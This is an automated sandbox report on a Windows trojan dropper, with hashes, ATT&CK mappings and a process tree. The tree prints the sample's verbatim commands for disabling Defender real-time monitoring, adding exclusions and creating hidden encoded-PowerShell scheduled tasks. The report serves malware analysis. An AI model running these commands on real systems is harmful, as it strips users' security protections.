848b74b49d5770fc1d119aeb76786f887ffa8316fde006b0162e1040f3ec3fbd

Analysis

max time kernel
151s
max time network
144s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
24-11-2022 12:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

7.2MB
MD5

080767677c91ff72a19363f71a1d14a3
SHA1

c1ce95aba4f5ab985f439b5dc9890a40454cb61d
SHA256

848b74b49d5770fc1d119aeb76786f887ffa8316fde006b0162e1040f3ec3fbd
SHA512

0eecb34312884fbde607b1ef9d2dc0f85d978088184ed6f169114416ada1988205743556b84c0d1c9b472c1a5a3079e023b45fe247f8be3ea8118140d7555e97
SSDEEP

196608:91Oicf3Qv9bnMYarNLZQcxZg+Utyrfc8Z5:3OicY+YOQcxSnsU05

Score

10^/10

evasion trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

Processes:

reg.exereg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe

Windows security bypass 2 TTPs 4 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

reg.exereg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\HQlSiZkrEcWzlGAW = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\HQlSiZkrEcWzlGAW = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe

Executes dropped EXE 3 IoCs

Processes:

Install.exeInstall.exebQoDNKF.exe

pid process

2044 Install.exe
2016 Install.exe
1724 bQoDNKF.exe
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.

Query Registry
T1012

System Information Discovery
T1082

Processes:

Install.exe

description ioc process

Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe
Loads dropped DLL 8 IoCs

Processes:

file.exeInstall.exeInstall.exe

pid process

280 file.exe
2044 Install.exe
2044 Install.exe
2044 Install.exe
2044 Install.exe
2016 Install.exe
2016 Install.exe
2016 Install.exe

pid	process
2044	Install.exe
2016	Install.exe
1724	bQoDNKF.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

pid	process
280	file.exe
2044	Install.exe
2044	Install.exe
2044	Install.exe
2044	Install.exe
2016	Install.exe
2016	Install.exe
2016	Install.exe

Drops file in System32 directory 7 IoCs

Processes:

Install.exepowershell.EXEbQoDNKF.exepowershell.EXEpowershell.EXE

description	ioc	process
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	bQoDNKF.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	bQoDNKF.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	bQoDNKF.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE

Drops file in Windows directory 1 IoCs

Processes:

schtasks.exe

description ioc process

File created C:\Windows\Tasks\bOiTQeSEdqGWpodAVP.job schtasks.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

320 schtasks.exe
1696 schtasks.exe
1336 schtasks.exe
332 schtasks.exe

description	ioc	process
File created	C:\Windows\Tasks\bOiTQeSEdqGWpodAVP.job	schtasks.exe

pid	process
320	schtasks.exe
1696	schtasks.exe
1336	schtasks.exe
332	schtasks.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

Install.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

powershell.EXEpowershell.EXEpowershell.EXE

pid	process
1032	powershell.EXE
1032	powershell.EXE
1032	powershell.EXE
1748	powershell.EXE
1748	powershell.EXE
1748	powershell.EXE
1788	powershell.EXE
1788	powershell.EXE
1788	powershell.EXE

Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.EXEpowershell.EXEpowershell.EXE

description pid process

Token: SeDebugPrivilege 1032 powershell.EXE
Token: SeDebugPrivilege 1748 powershell.EXE
Token: SeDebugPrivilege 1788 powershell.EXE

description	pid	process
Token: SeDebugPrivilege	1032	powershell.EXE
Token: SeDebugPrivilege	1748	powershell.EXE
Token: SeDebugPrivilege	1788	powershell.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

file.exeInstall.exeInstall.exeforfiles.exeforfiles.execmd.execmd.exe

description	pid	process	target process
PID 280 wrote to memory of 2044	280	file.exe	Install.exe
PID 280 wrote to memory of 2044	280	file.exe	Install.exe
PID 280 wrote to memory of 2044	280	file.exe	Install.exe
PID 280 wrote to memory of 2044	280	file.exe	Install.exe
PID 280 wrote to memory of 2044	280	file.exe	Install.exe
PID 280 wrote to memory of 2044	280	file.exe	Install.exe
PID 280 wrote to memory of 2044	280	file.exe	Install.exe
PID 2044 wrote to memory of 2016	2044	Install.exe	Install.exe
PID 2044 wrote to memory of 2016	2044	Install.exe	Install.exe
PID 2044 wrote to memory of 2016	2044	Install.exe	Install.exe
PID 2044 wrote to memory of 2016	2044	Install.exe	Install.exe
PID 2044 wrote to memory of 2016	2044	Install.exe	Install.exe
PID 2044 wrote to memory of 2016	2044	Install.exe	Install.exe
PID 2044 wrote to memory of 2016	2044	Install.exe	Install.exe
PID 2016 wrote to memory of 1992	2016	Install.exe	forfiles.exe
PID 2016 wrote to memory of 1992	2016	Install.exe	forfiles.exe
PID 2016 wrote to memory of 1992	2016	Install.exe	forfiles.exe
PID 2016 wrote to memory of 1992	2016	Install.exe	forfiles.exe
PID 2016 wrote to memory of 1992	2016	Install.exe	forfiles.exe
PID 2016 wrote to memory of 1992	2016	Install.exe	forfiles.exe
PID 2016 wrote to memory of 1992	2016	Install.exe	forfiles.exe
PID 2016 wrote to memory of 1232	2016	Install.exe	forfiles.exe
PID 2016 wrote to memory of 1232	2016	Install.exe	forfiles.exe
PID 2016 wrote to memory of 1232	2016	Install.exe	forfiles.exe
PID 2016 wrote to memory of 1232	2016	Install.exe	forfiles.exe
PID 2016 wrote to memory of 1232	2016	Install.exe	forfiles.exe
PID 2016 wrote to memory of 1232	2016	Install.exe	forfiles.exe
PID 2016 wrote to memory of 1232	2016	Install.exe	forfiles.exe
PID 1992 wrote to memory of 1448	1992	forfiles.exe	cmd.exe
PID 1992 wrote to memory of 1448	1992	forfiles.exe	cmd.exe
PID 1992 wrote to memory of 1448	1992	forfiles.exe	cmd.exe
PID 1992 wrote to memory of 1448	1992	forfiles.exe	cmd.exe
PID 1992 wrote to memory of 1448	1992	forfiles.exe	cmd.exe
PID 1992 wrote to memory of 1448	1992	forfiles.exe	cmd.exe
PID 1992 wrote to memory of 1448	1992	forfiles.exe	cmd.exe
PID 1232 wrote to memory of 1464	1232	forfiles.exe	cmd.exe
PID 1232 wrote to memory of 1464	1232	forfiles.exe	cmd.exe
PID 1232 wrote to memory of 1464	1232	forfiles.exe	cmd.exe
PID 1232 wrote to memory of 1464	1232	forfiles.exe	cmd.exe
PID 1232 wrote to memory of 1464	1232	forfiles.exe	cmd.exe
PID 1232 wrote to memory of 1464	1232	forfiles.exe	cmd.exe
PID 1232 wrote to memory of 1464	1232	forfiles.exe	cmd.exe
PID 1464 wrote to memory of 1828	1464	cmd.exe	reg.exe
PID 1464 wrote to memory of 1828	1464	cmd.exe	reg.exe
PID 1464 wrote to memory of 1828	1464	cmd.exe	reg.exe
PID 1464 wrote to memory of 1828	1464	cmd.exe	reg.exe
PID 1464 wrote to memory of 1828	1464	cmd.exe	reg.exe
PID 1464 wrote to memory of 1828	1464	cmd.exe	reg.exe
PID 1464 wrote to memory of 1828	1464	cmd.exe	reg.exe
PID 1448 wrote to memory of 1764	1448	cmd.exe	reg.exe
PID 1448 wrote to memory of 1764	1448	cmd.exe	reg.exe
PID 1448 wrote to memory of 1764	1448	cmd.exe	reg.exe
PID 1448 wrote to memory of 1764	1448	cmd.exe	reg.exe
PID 1448 wrote to memory of 1764	1448	cmd.exe	reg.exe
PID 1448 wrote to memory of 1764	1448	cmd.exe	reg.exe
PID 1448 wrote to memory of 1764	1448	cmd.exe	reg.exe
PID 1464 wrote to memory of 680	1464	cmd.exe	reg.exe
PID 1464 wrote to memory of 680	1464	cmd.exe	reg.exe
PID 1464 wrote to memory of 680	1464	cmd.exe	reg.exe
PID 1464 wrote to memory of 680	1464	cmd.exe	reg.exe
PID 1464 wrote to memory of 680	1464	cmd.exe	reg.exe
PID 1464 wrote to memory of 680	1464	cmd.exe	reg.exe
PID 1464 wrote to memory of 680	1464	cmd.exe	reg.exe
PID 1448 wrote to memory of 1592	1448	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:280

C:\Users\Admin\AppData\Local\Temp\7zSFBA.tmp\Install.exe
.\Install.exe
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2044

C:\Users\Admin\AppData\Local\Temp\7zS1556.tmp\Install.exe
.\Install.exe /S /site_id "525403"
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2016

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
4⤵
- Suspicious use of WriteProcessMemory
PID:1992

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
5⤵
- Suspicious use of WriteProcessMemory
PID:1448

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
6⤵
PID:1764

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
6⤵
PID:1592

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
4⤵
- Suspicious use of WriteProcessMemory
PID:1232

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
5⤵
- Suspicious use of WriteProcessMemory
PID:1464

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
6⤵
PID:1828

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
6⤵
PID:680

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gqXOKbgCc" /SC once /ST 00:48:20 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
4⤵
- Creates scheduled task(s)
PID:320

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gqXOKbgCc"
4⤵
PID:1456

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gqXOKbgCc"
4⤵
PID:2000

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bOiTQeSEdqGWpodAVP" /SC once /ST 13:10:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\NxpzojmDGHSzrlvuc\hZjsoBMRqZccvfN\bQoDNKF.exe\" qH /site_id 525403 /S" /V1 /F
4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1696

C:\Windows\system32\taskeng.exe
taskeng.exe {E41CE510-1E80-4119-9A90-23291ED94659} S-1-5-21-3845472200-3839195424-595303356-1000:ZERMMMDR\Admin:Interactive:[1]
1⤵
PID:1148

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1032

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:1688

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1748

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:1916

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1788

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:1284

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1520

C:\Windows\system32\taskeng.exe
taskeng.exe {D3A9575E-06D5-4A5D-9927-79F92D47BE53} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:1460

C:\Users\Admin\AppData\Local\Temp\NxpzojmDGHSzrlvuc\hZjsoBMRqZccvfN\bQoDNKF.exe
C:\Users\Admin\AppData\Local\Temp\NxpzojmDGHSzrlvuc\hZjsoBMRqZccvfN\bQoDNKF.exe qH /site_id 525403 /S
2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1724

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gTVuFKoji" /SC once /ST 10:57:16 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- Creates scheduled task(s)
PID:1336

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gTVuFKoji"
3⤵
PID:632

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gTVuFKoji"
3⤵
PID:900

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
3⤵
PID:2000

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:1696

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
3⤵
PID:524

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:1136

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gqUVMOWvF" /SC once /ST 12:04:41 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- Creates scheduled task(s)
PID:332

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gqUVMOWvF"
3⤵
PID:1344

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gqUVMOWvF"
3⤵
PID:1144

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HQlSiZkrEcWzlGAW" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1820

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HQlSiZkrEcWzlGAW" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:844

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HQlSiZkrEcWzlGAW" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1944

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HQlSiZkrEcWzlGAW" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:1596

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HQlSiZkrEcWzlGAW" /t REG_DWORD /d 0 /reg:32
3⤵
PID:768

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1096

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:472

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Disabling Security Tools

T1089

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\7zS1556.tmp\Install.exe
Filesize
6.9MB

MD5
d79a29b6aa821673c188f915dc56ae80

SHA1
2421d06578a21df21502845505690da36500ceef

SHA256
c4d3ba42160af13824a9f5ff2c5b2dfecf2c9bcb3b0e25b20f938af9cda6a225

SHA512
2da26d48a25865bb7f3dde24a2476ae7fe76ceb5d9b61892cea0f066b1b799ae353fbaad1608a763e7dc386f759c354310d7978dc980190178186f619354ad25

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS1556.tmp\Install.exe
Filesize
6.9MB

MD5
d79a29b6aa821673c188f915dc56ae80

SHA1
2421d06578a21df21502845505690da36500ceef

SHA256
c4d3ba42160af13824a9f5ff2c5b2dfecf2c9bcb3b0e25b20f938af9cda6a225

SHA512
2da26d48a25865bb7f3dde24a2476ae7fe76ceb5d9b61892cea0f066b1b799ae353fbaad1608a763e7dc386f759c354310d7978dc980190178186f619354ad25

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSFBA.tmp\Install.exe
Filesize
6.3MB

MD5
e3ef96614e42747c4f3ac0e8e6084971

SHA1
ba1b1178e1b1bf40c31639d27fb6fb9d0a3957b3

SHA256
5fc3ad6af7aabd25ed839677e888dfee6492ce6e9f65d9cc8f269bac4241be10

SHA512
abc0d4aed3984775351307c9b8984e842bcd099cb52c7e04cbe2de634d70faabb507cb4c95b1c4887dc653815d084cb05929f461744cd1737adede0225a1253b

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSFBA.tmp\Install.exe
Filesize
6.3MB

MD5
e3ef96614e42747c4f3ac0e8e6084971

SHA1
ba1b1178e1b1bf40c31639d27fb6fb9d0a3957b3

SHA256
5fc3ad6af7aabd25ed839677e888dfee6492ce6e9f65d9cc8f269bac4241be10

SHA512
abc0d4aed3984775351307c9b8984e842bcd099cb52c7e04cbe2de634d70faabb507cb4c95b1c4887dc653815d084cb05929f461744cd1737adede0225a1253b

Download Submit
C:\Users\Admin\AppData\Local\Temp\NxpzojmDGHSzrlvuc\hZjsoBMRqZccvfN\bQoDNKF.exe
Filesize
6.9MB

MD5
d79a29b6aa821673c188f915dc56ae80

SHA1
2421d06578a21df21502845505690da36500ceef

SHA256
c4d3ba42160af13824a9f5ff2c5b2dfecf2c9bcb3b0e25b20f938af9cda6a225

SHA512
2da26d48a25865bb7f3dde24a2476ae7fe76ceb5d9b61892cea0f066b1b799ae353fbaad1608a763e7dc386f759c354310d7978dc980190178186f619354ad25

Download Submit
C:\Users\Admin\AppData\Local\Temp\NxpzojmDGHSzrlvuc\hZjsoBMRqZccvfN\bQoDNKF.exe
Filesize
6.9MB

MD5
d79a29b6aa821673c188f915dc56ae80

SHA1
2421d06578a21df21502845505690da36500ceef

SHA256
c4d3ba42160af13824a9f5ff2c5b2dfecf2c9bcb3b0e25b20f938af9cda6a225

SHA512
2da26d48a25865bb7f3dde24a2476ae7fe76ceb5d9b61892cea0f066b1b799ae353fbaad1608a763e7dc386f759c354310d7978dc980190178186f619354ad25

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
0ce4bc01f75572d2a4344261338f4431

SHA1
e3f94cb0b35cbb91ed59177980962f1f26b795dc

SHA256
1271b938f984fea5dc07ecf6e89e065731eca6cb91ae1cd6037d3518dea1de92

SHA512
d36b473d41e8bd4d368ee9e7878551dac82aece92e74741b38b3cb63beea433fc81cf26bcd672772843b98cb80b1f3240f9ae8f1a43b4ba747eb85b18abed05f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
b6a652e06a99ad596b3695939733bdef

SHA1
f94f99a8261a026198d37bb13cf59f1430b04c0f

SHA256
269dbb5f18a761e0bb78910fd7faeef7f1331435d0c8a340cf2786b475f10ba5

SHA512
5121c95f431f1792f153a88a986c7e6ac79378bc92d3601425caf5b6b69f4ef050cda0261c1ffe6503f17b97a36d5235314cf9fc653e8d2be0853a3b9e06fb4b

Download Submit
C:\Windows\system32\GroupPolicy\gpt.ini
Filesize
268B

MD5
a62ce44a33f1c05fc2d340ea0ca118a4

SHA1
1f03eb4716015528f3de7f7674532c1345b2717d

SHA256
9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a

SHA512
9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\Users\Admin\AppData\Local\Temp\7zS1556.tmp\Install.exe
Filesize
6.9MB

MD5
d79a29b6aa821673c188f915dc56ae80

SHA1
2421d06578a21df21502845505690da36500ceef

SHA256
c4d3ba42160af13824a9f5ff2c5b2dfecf2c9bcb3b0e25b20f938af9cda6a225

SHA512
2da26d48a25865bb7f3dde24a2476ae7fe76ceb5d9b61892cea0f066b1b799ae353fbaad1608a763e7dc386f759c354310d7978dc980190178186f619354ad25

Download Submit
\Users\Admin\AppData\Local\Temp\7zS1556.tmp\Install.exe
Filesize
6.9MB

MD5
d79a29b6aa821673c188f915dc56ae80

SHA1
2421d06578a21df21502845505690da36500ceef

SHA256
c4d3ba42160af13824a9f5ff2c5b2dfecf2c9bcb3b0e25b20f938af9cda6a225

SHA512
2da26d48a25865bb7f3dde24a2476ae7fe76ceb5d9b61892cea0f066b1b799ae353fbaad1608a763e7dc386f759c354310d7978dc980190178186f619354ad25

Download Submit
\Users\Admin\AppData\Local\Temp\7zS1556.tmp\Install.exe
Filesize
6.9MB

MD5
d79a29b6aa821673c188f915dc56ae80

SHA1
2421d06578a21df21502845505690da36500ceef

SHA256
c4d3ba42160af13824a9f5ff2c5b2dfecf2c9bcb3b0e25b20f938af9cda6a225

SHA512
2da26d48a25865bb7f3dde24a2476ae7fe76ceb5d9b61892cea0f066b1b799ae353fbaad1608a763e7dc386f759c354310d7978dc980190178186f619354ad25

Download Submit
\Users\Admin\AppData\Local\Temp\7zS1556.tmp\Install.exe
Filesize
6.9MB

MD5
d79a29b6aa821673c188f915dc56ae80

SHA1
2421d06578a21df21502845505690da36500ceef

SHA256
c4d3ba42160af13824a9f5ff2c5b2dfecf2c9bcb3b0e25b20f938af9cda6a225

SHA512
2da26d48a25865bb7f3dde24a2476ae7fe76ceb5d9b61892cea0f066b1b799ae353fbaad1608a763e7dc386f759c354310d7978dc980190178186f619354ad25

Download Submit
\Users\Admin\AppData\Local\Temp\7zSFBA.tmp\Install.exe
Filesize
6.3MB

MD5
